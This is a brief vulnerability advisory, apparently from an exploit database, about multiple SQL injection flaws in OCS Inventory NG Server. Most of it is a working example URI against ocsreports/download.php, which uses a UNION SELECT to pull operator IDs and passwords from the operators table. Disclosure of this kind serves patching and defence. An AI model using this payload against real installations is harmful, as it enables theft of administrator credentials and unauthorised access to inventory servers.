OCS Inventory NG Server Multiple SQL Injection Vulnerabilities

OCS Inventory NG Server Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URI is available:

http://www.example.com/ocsreports/download.php?n=1&dl=2&o=3&=4'union+all+select+concat(id,':',passwd)+from+operators%23